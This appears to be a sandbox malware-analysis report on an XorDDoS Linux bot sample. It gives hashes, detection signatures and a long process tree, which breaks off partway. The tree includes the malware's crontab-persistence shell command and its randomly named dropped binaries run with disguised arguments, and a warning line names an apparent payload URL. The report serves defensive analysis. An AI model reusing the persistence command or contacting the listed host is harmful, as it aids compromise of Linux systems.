Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dkuidbsedp

Overview

General Information

Sample Name:	dkuidbsedp
Analysis ID:	674155
MD5:	37542894283b8851469753de69c0bcdc
SHA1:	0480f29f346b400b989d88798b4418d5ef0fd3d9
SHA256:	7c0d5161ad70acf5b98b640089d23ada44935dcd7240c64d43f7cc54d853acb1
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Snort IDS alert for network traffic

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "systemctl" command used for controlling the systemd system and service manager

Detected non-DNS traffic on DNS port

Sample and/or dropped files contains symbols with suspicious names

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

×

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	674155
Start date and time: 27/07/202209:47:30	2022-07-27 09:47:30 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dkuidbsedp
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.troj.evad.lin@0/20@5/0

Warnings

VT rate limit hit for: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl

Runtime Messages

Command:	/tmp/dkuidbsedp
PID:	9445
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu1

dkuidbsedp (PID: 9445, Parent: 9377, MD5: 37542894283b8851469753de69c0bcdc) Arguments: /tmp/dkuidbsedp

dkuidbsedp New Fork (PID: 9446, Parent: 9445)

dkuidbsedp New Fork (PID: 9450, Parent: 9446)

dkuidbsedp New Fork (PID: 9453, Parent: 9450)

dkuidbsedp New Fork (PID: 9457, Parent: 9446)

dkuidbsedp New Fork (PID: 9458, Parent: 9457)

update-rc.d (PID: 9458, Parent: 9457, MD5: e9e125904f9ed8ff4c8504a55a149005) Arguments: /usr/bin/perl /usr/sbin/update-rc.d dkuidbsedp defaults

update-rc.d New Fork (PID: 9493, Parent: 9458)

insserv (PID: 9493, Parent: 9458, MD5: 34c11674a0b29347001640aeae7c94f1) Arguments: /usr/lib/insserv/insserv dkuidbsedp

update-rc.d New Fork (PID: 9537, Parent: 9458)

systemctl (PID: 9537, Parent: 9458, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload

dkuidbsedp New Fork (PID: 9469, Parent: 9446)

dash (PID: 9469, Parent: 9446, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

dash New Fork (PID: 9472, Parent: 9469)

sed (PID: 9472, Parent: 9469, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

dkuidbsedp New Fork (PID: 9546, Parent: 9446)

dkuidbsedp New Fork (PID: 9547, Parent: 9546)

qvilroogsz (PID: 9547, Parent: 9546, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "ls -la" 9446

qvilroogsz New Fork (PID: 9548, Parent: 9547)

dkuidbsedp New Fork (PID: 9557, Parent: 9446)

dkuidbsedp New Fork (PID: 9558, Parent: 9557)

qvilroogsz (PID: 9558, Parent: 9557, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "cat resolv.conf" 9446

qvilroogsz New Fork (PID: 9559, Parent: 9558)

dkuidbsedp New Fork (PID: 9568, Parent: 9446)

dkuidbsedp New Fork (PID: 9569, Parent: 9568)

qvilroogsz (PID: 9569, Parent: 9568, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "grep \"A\"" 9446

qvilroogsz New Fork (PID: 9570, Parent: 9569)

dkuidbsedp New Fork (PID: 9579, Parent: 9446)

dkuidbsedp New Fork (PID: 9580, Parent: 9579)

qvilroogsz (PID: 9580, Parent: 9579, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "netstat -antop" 9446

qvilroogsz New Fork (PID: 9581, Parent: 9580)

dkuidbsedp New Fork (PID: 9590, Parent: 9446)

dkuidbsedp New Fork (PID: 9591, Parent: 9590)

qvilroogsz (PID: 9591, Parent: 9590, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "netstat -antop" 9446

qvilroogsz New Fork (PID: 9592, Parent: 9591)

dkuidbsedp New Fork (PID: 9601, Parent: 9446)

dkuidbsedp New Fork (PID: 9602, Parent: 9601)

wyyhrifhaz (PID: 9602, Parent: 9601, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz bash 9446

wyyhrifhaz New Fork (PID: 9603, Parent: 9602)

dkuidbsedp New Fork (PID: 9612, Parent: 9446)

dkuidbsedp New Fork (PID: 9613, Parent: 9612)

wyyhrifhaz (PID: 9613, Parent: 9612, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz "cd /etc" 9446

wyyhrifhaz New Fork (PID: 9614, Parent: 9613)

dkuidbsedp New Fork (PID: 9623, Parent: 9446)

dkuidbsedp New Fork (PID: 9624, Parent: 9623)

wyyhrifhaz (PID: 9624, Parent: 9623, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz whoami 9446

wyyhrifhaz New Fork (PID: 9626, Parent: 9624)

dkuidbsedp New Fork (PID: 9634, Parent: 9446)

dkuidbsedp New Fork (PID: 9635, Parent: 9634)

wyyhrifhaz (PID: 9635, Parent: 9634, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz id 9446

wyyhrifhaz New Fork (PID: 9636, Parent: 9635)

dkuidbsedp New Fork (PID: 9644, Parent: 9446)

dkuidbsedp New Fork (PID: 9646, Parent: 9644)

wyyhrifhaz (PID: 9646, Parent: 9644, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz "netstat -an" 9446

wyyhrifhaz New Fork (PID: 9647, Parent: 9646)

dkuidbsedp New Fork (PID: 9656, Parent: 9446)

dkuidbsedp New Fork (PID: 9657, Parent: 9656)

wrfeamwlub (PID: 9657, Parent: 9656, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub id 9446

wrfeamwlub New Fork (PID: 9658, Parent: 9657)

dkuidbsedp New Fork (PID: 9667, Parent: 9446)

dkuidbsedp New Fork (PID: 9668, Parent: 9667)

wrfeamwlub (PID: 9668, Parent: 9667, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub ls 9446

wrfeamwlub New Fork (PID: 9669, Parent: 9668)

dkuidbsedp New Fork (PID: 9678, Parent: 9446)

dkuidbsedp New Fork (PID: 9679, Parent: 9678)

wrfeamwlub (PID: 9679, Parent: 9678, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub "echo \"find\"" 9446

wrfeamwlub New Fork (PID: 9680, Parent: 9679)

dkuidbsedp New Fork (PID: 9689, Parent: 9446)

dkuidbsedp New Fork (PID: 9690, Parent: 9689)

wrfeamwlub (PID: 9690, Parent: 9689, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub "ifconfig eth0" 9446

wrfeamwlub New Fork (PID: 9691, Parent: 9690)

dkuidbsedp New Fork (PID: 9700, Parent: 9446)

dkuidbsedp New Fork (PID: 9701, Parent: 9700)

wrfeamwlub (PID: 9701, Parent: 9700, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub id 9446

wrfeamwlub New Fork (PID: 9702, Parent: 9701)

dkuidbsedp New Fork (PID: 9711, Parent: 9446)

dkuidbsedp New Fork (PID: 9712, Parent: 9711)

wgpgdetjwe (PID: 9712, Parent: 9711, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "ps -ef" 9446

wgpgdetjwe New Fork (PID: 9713, Parent: 9712)

dkuidbsedp New Fork (PID: 9722, Parent: 9446)

dkuidbsedp New Fork (PID: 9723, Parent: 9722)

wgpgdetjwe (PID: 9723, Parent: 9722, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe whoami 9446

wgpgdetjwe New Fork (PID: 9724, Parent: 9723)

dkuidbsedp New Fork (PID: 9733, Parent: 9446)

dkuidbsedp New Fork (PID: 9734, Parent: 9733)

wgpgdetjwe (PID: 9734, Parent: 9733, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "ifconfig eth0" 9446

wgpgdetjwe New Fork (PID: 9735, Parent: 9734)

dkuidbsedp New Fork (PID: 9744, Parent: 9446)

dkuidbsedp New Fork (PID: 9745, Parent: 9744)

wgpgdetjwe (PID: 9745, Parent: 9744, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "grep \"A\"" 9446

wgpgdetjwe New Fork (PID: 9746, Parent: 9745)

dkuidbsedp New Fork (PID: 9755, Parent: 9446)

dkuidbsedp New Fork (PID: 9756, Parent: 9755)

wgpgdetjwe (PID: 9756, Parent: 9755, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "route -n" 9446

wgpgdetjwe New Fork (PID: 9758, Parent: 9756)

dkuidbsedp New Fork (PID: 9766, Parent: 9446)

dkuidbsedp New Fork (PID: 9767, Parent: 9766)

zyapsjpaje (PID: 9767, Parent: 9766, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje su 9446

zyapsjpaje New Fork (PID: 9768, Parent: 9767)

dkuidbsedp New Fork (PID: 9777, Parent: 9446)

dkuidbsedp New Fork (PID: 9778, Parent: 9777)

zyapsjpaje (PID: 9778, Parent: 9777, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje "ps -ef" 9446

zyapsjpaje New Fork (PID: 9779, Parent: 9778)

dkuidbsedp New Fork (PID: 9788, Parent: 9446)

dkuidbsedp New Fork (PID: 9789, Parent: 9788)

zyapsjpaje (PID: 9789, Parent: 9788, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje bash 9446

zyapsjpaje New Fork (PID: 9790, Parent: 9789)

dkuidbsedp New Fork (PID: 9799, Parent: 9446)

dkuidbsedp New Fork (PID: 9800, Parent: 9799)

zyapsjpaje (PID: 9800, Parent: 9799, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje ls 9446

zyapsjpaje New Fork (PID: 9801, Parent: 9800)

dkuidbsedp New Fork (PID: 9810, Parent: 9446)

dkuidbsedp New Fork (PID: 9811, Parent: 9810)

zyapsjpaje (PID: 9811, Parent: 9810, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje "echo \"find\"" 9446

zyapsjpaje New Fork (PID: 9812, Parent: 9811)

dkuidbsedp New Fork (PID: 9821, Parent: 9446)

dkuidbsedp New Fork (PID: 9822, Parent: 9821)

yfiimchuiz (PID: 9822, Parent: 9821, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz id 9446

yfiimchuiz New Fork (PID: 9823, Parent: 9822)

dkuidbsedp New Fork (PID: 9832, Parent: 9446)

dkuidbsedp New Fork (PID: 9833, Parent: 9832)

yfiimchuiz (PID: 9833, Parent: 9832, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz pwd 9446

yfiimchuiz New Fork (PID: 9835, Parent: 9833)

dkuidbsedp New Fork (PID: 9843, Parent: 9446)

dkuidbsedp New Fork (PID: 9844, Parent: 9843)

yfiimchuiz (PID: 9844, Parent: 9843, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz pwd 9446

yfiimchuiz New Fork (PID: 9845, Parent: 9844)

dkuidbsedp New Fork (PID: 9854, Parent: 9446)

dkuidbsedp New Fork (PID: 9855, Parent: 9854)

yfiimchuiz (PID: 9855, Parent: 9854, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz id 9446

yfiimchuiz New Fork (PID: 9856, Parent: 9855)

dkuidbsedp New Fork (PID: 9865, Parent: 9446)

dkuidbsedp New Fork (PID: 9866, Parent: 9865)

yfiimchuiz (PID: 9866, Parent: 9865, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz gnome-terminal 9446

yfiimchuiz New Fork (PID: 9867, Parent: 9866)

dkuidbsedp New Fork (PID: 9876, Parent: 9446)

dkuidbsedp New Fork (PID: 9877, Parent: 9876)

txflbjqefg (PID: 9877, Parent: 9876, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "sleep 1" 9446

txflbjqefg New Fork (PID: 9878, Parent: 9877)

dkuidbsedp New Fork (PID: 9887, Parent: 9446)

dkuidbsedp New Fork (PID: 9888, Parent: 9887)

txflbjqefg (PID: 9888, Parent: 9887, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg top 9446

txflbjqefg New Fork (PID: 9889, Parent: 9888)

dkuidbsedp New Fork (PID: 9898, Parent: 9446)

dkuidbsedp New Fork (PID: 9899, Parent: 9898)

txflbjqefg (PID: 9899, Parent: 9898, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg gnome-terminal 9446

txflbjqefg New Fork (PID: 9900, Parent: 9899)

dkuidbsedp New Fork (PID: 9909, Parent: 9446)

dkuidbsedp New Fork (PID: 9910, Parent: 9909)

txflbjqefg (PID: 9910, Parent: 9909, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "ls -la" 9446

txflbjqefg New Fork (PID: 9911, Parent: 9910)

dkuidbsedp New Fork (PID: 9920, Parent: 9446)

dkuidbsedp New Fork (PID: 9921, Parent: 9920)

txflbjqefg (PID: 9921, Parent: 9920, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "ps -ef" 9446

txflbjqefg New Fork (PID: 9922, Parent: 9921)

dkuidbsedp New Fork (PID: 9931, Parent: 9446)

dkuidbsedp New Fork (PID: 9932, Parent: 9931)

qjfxtxsijs (PID: 9932, Parent: 9931, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs ifconfig 9446

qjfxtxsijs New Fork (PID: 9933, Parent: 9932)

dkuidbsedp New Fork (PID: 9942, Parent: 9446)

dkuidbsedp New Fork (PID: 9943, Parent: 9942)

qjfxtxsijs (PID: 9943, Parent: 9942, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs "route -n" 9446

qjfxtxsijs New Fork (PID: 9944, Parent: 9943)

dkuidbsedp New Fork (PID: 9953, Parent: 9446)

dkuidbsedp New Fork (PID: 9954, Parent: 9953)

qjfxtxsijs (PID: 9954, Parent: 9953, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs pwd 9446

qjfxtxsijs New Fork (PID: 9955, Parent: 9954)

dkuidbsedp New Fork (PID: 9964, Parent: 9446)

dkuidbsedp New Fork (PID: 9965, Parent: 9964)

qjfxtxsijs (PID: 9965, Parent: 9964, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs id 9446

qjfxtxsijs New Fork (PID: 9966, Parent: 9965)

dkuidbsedp New Fork (PID: 9975, Parent: 9446)

dkuidbsedp New Fork (PID: 9976, Parent: 9975)

qjfxtxsijs (PID: 9976, Parent: 9975, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs "cat resolv.conf" 9446

qjfxtxsijs New Fork (PID: 9977, Parent: 9976)

dkuidbsedp New Fork (PID: 9988, Parent: 9446)

dkuidbsedp New Fork (PID: 9989, Parent: 9988)

tudlcvpgbc (PID: 9989, Parent: 9988, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "netstat -an" 9446

tudlcvpgbc New Fork (PID: 9990, Parent: 9989)

dkuidbsedp New Fork (PID: 9999, Parent: 9446)

dkuidbsedp New Fork (PID: 10000, Parent: 9999)

tudlcvpgbc (PID: 10000, Parent: 9999, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc id 9446

tudlcvpgbc New Fork (PID: 10001, Parent: 10000)

dkuidbsedp New Fork (PID: 10010, Parent: 9446)

dkuidbsedp New Fork (PID: 10011, Parent: 10010)

tudlcvpgbc (PID: 10011, Parent: 10010, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "sleep 1" 9446

tudlcvpgbc New Fork (PID: 10012, Parent: 10011)

dkuidbsedp New Fork (PID: 10021, Parent: 9446)

dkuidbsedp New Fork (PID: 10022, Parent: 10021)

tudlcvpgbc (PID: 10022, Parent: 10021, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "route -n" 9446

tudlcvpgbc New Fork (PID: 10023, Parent: 10022)

dkuidbsedp New Fork (PID: 10032, Parent: 9446)

dkuidbsedp New Fork (PID: 10033, Parent: 10032)

tudlcvpgbc (PID: 10033, Parent: 10032, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "ls -la" 9446

tudlcvpgbc New Fork (PID: 10034, Parent: 10033)

dkuidbsedp New Fork (PID: 10043, Parent: 9446)

dkuidbsedp New Fork (PID: 10044, Parent: 10043)

whtzopaggc (PID: 10044, Parent: 10043, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "echo \"find\"" 9446

whtzopaggc New Fork (PID: 10045, Parent: 10044)

dkuidbsedp New Fork (PID: 10054, Parent: 9446)

dkuidbsedp New Fork (PID: 10055, Parent: 10054)

whtzopaggc (PID: 10055, Parent: 10054, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "grep \"A\"" 9446

whtzopaggc New Fork (PID: 10056, Parent: 10055)

dkuidbsedp New Fork (PID: 10065, Parent: 9446)

dkuidbsedp New Fork (PID: 10066, Parent: 10065)

whtzopaggc (PID: 10066, Parent: 10065, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc bash 9446

whtzopaggc New Fork (PID: 10068, Parent: 10066)

dkuidbsedp New Fork (PID: 10076, Parent: 9446)

dkuidbsedp New Fork (PID: 10077, Parent: 10076)

whtzopaggc (PID: 10077, Parent: 10076, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc gnome-terminal 9446

whtzopaggc New Fork (PID: 10078, Parent: 10077)

dkuidbsedp New Fork (PID: 10087, Parent: 9446)

dkuidbsedp New Fork (PID: 10088, Parent: 10087)

whtzopaggc (PID: 10088, Parent: 10087, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "netstat -an" 9446

whtzopaggc New Fork (PID: 10089, Parent: 10088)

dkuidbsedp New Fork (PID: 10098, Parent: 9446)

dkuidbsedp New Fork (PID: 10099, Parent: 10098)

kmavqzvhro (PID: 10099, Parent: 10098, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro bash 9446

kmavqzvhro New Fork (PID: 10100, Parent: 10099)

dkuidbsedp New Fork (PID: 10109, Parent: 9446)

dkuidbsedp New Fork (PID: 10110, Parent: 10109)

kmavqzvhro (PID: 10110, Parent: 10109, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro ifconfig 9446

kmavqzvhro New Fork (PID: 10111, Parent: 10110)

dkuidbsedp New Fork (PID: 10120, Parent: 9446)

dkuidbsedp New Fork (PID: 10121, Parent: 10120)

kmavqzvhro (PID: 10121, Parent: 10120, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro "ps -ef" 9446

kmavqzvhro New Fork (PID: 10122, Parent: 10121)

dkuidbsedp New Fork (PID: 10131, Parent: 9446)

dkuidbsedp New Fork (PID: 10132, Parent: 10131)

kmavqzvhro (PID: 10132, Parent: 10131, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro "route -n" 9446

kmavqzvhro New Fork (PID: 10133, Parent: 10132)

dkuidbsedp New Fork (PID: 10142, Parent: 9446)

dkuidbsedp New Fork (PID: 10143, Parent: 10142)

kmavqzvhro (PID: 10143, Parent: 10142, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro whoami 9446

kmavqzvhro New Fork (PID: 10144, Parent: 10143)

dkuidbsedp New Fork (PID: 10153, Parent: 9446)

dkuidbsedp New Fork (PID: 10154, Parent: 10153)

zetazkptwu (PID: 10154, Parent: 10153, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ps -ef" 9446

zetazkptwu New Fork (PID: 10155, Parent: 10154)

dkuidbsedp New Fork (PID: 10164, Parent: 9446)

dkuidbsedp New Fork (PID: 10165, Parent: 10164)

zetazkptwu (PID: 10165, Parent: 10164, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu gnome-terminal 9446

zetazkptwu New Fork (PID: 10166, Parent: 10165)

dkuidbsedp New Fork (PID: 10175, Parent: 9446)

dkuidbsedp New Fork (PID: 10176, Parent: 10175)

zetazkptwu (PID: 10176, Parent: 10175, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ifconfig eth0" 9446

zetazkptwu New Fork (PID: 10177, Parent: 10176)

dkuidbsedp New Fork (PID: 10186, Parent: 9446)

dkuidbsedp New Fork (PID: 10187, Parent: 10186)

zetazkptwu (PID: 10187, Parent: 10186, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu who 9446

zetazkptwu New Fork (PID: 10188, Parent: 10187)

dkuidbsedp New Fork (PID: 10197, Parent: 9446)

dkuidbsedp New Fork (PID: 10198, Parent: 10197)

zetazkptwu (PID: 10198, Parent: 10197, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ls -la" 9446

zetazkptwu New Fork (PID: 10199, Parent: 10198)

dkuidbsedp New Fork (PID: 10208, Parent: 9446)

dkuidbsedp New Fork (PID: 10209, Parent: 10208)

jvzzirmjsa (PID: 10209, Parent: 10208, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa su 9446

jvzzirmjsa New Fork (PID: 10210, Parent: 10209)

dkuidbsedp New Fork (PID: 10219, Parent: 9446)

dkuidbsedp New Fork (PID: 10220, Parent: 10219)

jvzzirmjsa (PID: 10220, Parent: 10219, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa bash 9446

jvzzirmjsa New Fork (PID: 10221, Parent: 10220)

dkuidbsedp New Fork (PID: 10230, Parent: 9446)

dkuidbsedp New Fork (PID: 10231, Parent: 10230)

jvzzirmjsa (PID: 10231, Parent: 10230, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "cat resolv.conf" 9446

jvzzirmjsa New Fork (PID: 10232, Parent: 10231)

dkuidbsedp New Fork (PID: 10241, Parent: 9446)

dkuidbsedp New Fork (PID: 10242, Parent: 10241)

jvzzirmjsa (PID: 10242, Parent: 10241, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "grep \"A\"" 9446

jvzzirmjsa New Fork (PID: 10243, Parent: 10242)

dkuidbsedp New Fork (PID: 10252, Parent: 9446)

dkuidbsedp New Fork (PID: 10253, Parent: 10252)

jvzzirmjsa (PID: 10253, Parent: 10252, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "echo \"find\"" 9446

jvzzirmjsa New Fork (PID: 10254, Parent: 10253)

dkuidbsedp New Fork (PID: 10263, Parent: 9446)

dkuidbsedp New Fork (PID: 10264, Parent: 10263)

gkckltchoc (PID: 10264, Parent: 10263, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc pwd 9446

gkckltchoc New Fork (PID: 10265, Parent: 10264)

dkuidbsedp New Fork (PID: 10274, Parent: 9446)

dkuidbsedp New Fork (PID: 10275, Parent: 10274)

gkckltchoc (PID: 10275, Parent: 10274, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc id 9446

gkckltchoc New Fork (PID: 10276, Parent: 10275)

dkuidbsedp New Fork (PID: 10285, Parent: 9446)

dkuidbsedp New Fork (PID: 10286, Parent: 10285)

gkckltchoc (PID: 10286, Parent: 10285, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc "ls -la" 9446

gkckltchoc New Fork (PID: 10287, Parent: 10286)

dkuidbsedp New Fork (PID: 10296, Parent: 9446)

dkuidbsedp New Fork (PID: 10297, Parent: 10296)

gkckltchoc (PID: 10297, Parent: 10296, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc ifconfig 9446

gkckltchoc New Fork (PID: 10299, Parent: 10297)

dkuidbsedp New Fork (PID: 10307, Parent: 9446)

dkuidbsedp New Fork (PID: 10308, Parent: 10307)

gkckltchoc (PID: 10308, Parent: 10307, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc "netstat -an" 9446

gkckltchoc New Fork (PID: 10309, Parent: 10308)

dkuidbsedp New Fork (PID: 10318, Parent: 9446)

dkuidbsedp New Fork (PID: 10319, Parent: 10318)

rlxosagpct (PID: 10319, Parent: 10318, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct ifconfig 9446

rlxosagpct New Fork (PID: 10320, Parent: 10319)

dkuidbsedp New Fork (PID: 10329, Parent: 9446)

dkuidbsedp New Fork (PID: 10330, Parent: 10329)

rlxosagpct (PID: 10330, Parent: 10329, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct pwd 9446

rlxosagpct New Fork (PID: 10331, Parent: 10330)

dkuidbsedp New Fork (PID: 10340, Parent: 9446)

dkuidbsedp New Fork (PID: 10341, Parent: 10340)

rlxosagpct (PID: 10341, Parent: 10340, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct id 9446

rlxosagpct New Fork (PID: 10342, Parent: 10341)

dkuidbsedp New Fork (PID: 10351, Parent: 9446)

dkuidbsedp New Fork (PID: 10352, Parent: 10351)

rlxosagpct (PID: 10352, Parent: 10351, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct pwd 9446

rlxosagpct New Fork (PID: 10353, Parent: 10352)

dkuidbsedp New Fork (PID: 10362, Parent: 9446)

dkuidbsedp New Fork (PID: 10363, Parent: 10362)

rlxosagpct (PID: 10363, Parent: 10362, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct whoami 9446

rlxosagpct New Fork (PID: 10364, Parent: 10363)

dkuidbsedp New Fork (PID: 10373, Parent: 9446)

dkuidbsedp New Fork (PID: 10374, Parent: 10373)

pnljtnsppb (PID: 10374, Parent: 10373, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "netstat -antop" 9446

pnljtnsppb New Fork (PID: 10375, Parent: 10374)

dkuidbsedp New Fork (PID: 10384, Parent: 9446)

dkuidbsedp New Fork (PID: 10385, Parent: 10384)

pnljtnsppb (PID: 10385, Parent: 10384, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb who 9446

pnljtnsppb New Fork (PID: 10386, Parent: 10385)

dkuidbsedp New Fork (PID: 10395, Parent: 9446)

dkuidbsedp New Fork (PID: 10396, Parent: 10395)

pnljtnsppb (PID: 10396, Parent: 10395, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "ifconfig eth0" 9446

pnljtnsppb New Fork (PID: 10397, Parent: 10396)

dkuidbsedp New Fork (PID: 10406, Parent: 9446)

dkuidbsedp New Fork (PID: 10407, Parent: 10406)

pnljtnsppb (PID: 10407, Parent: 10406, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "grep \"A\"" 9446

pnljtnsppb New Fork (PID: 10408, Parent: 10407)

dkuidbsedp New Fork (PID: 10417, Parent: 9446)

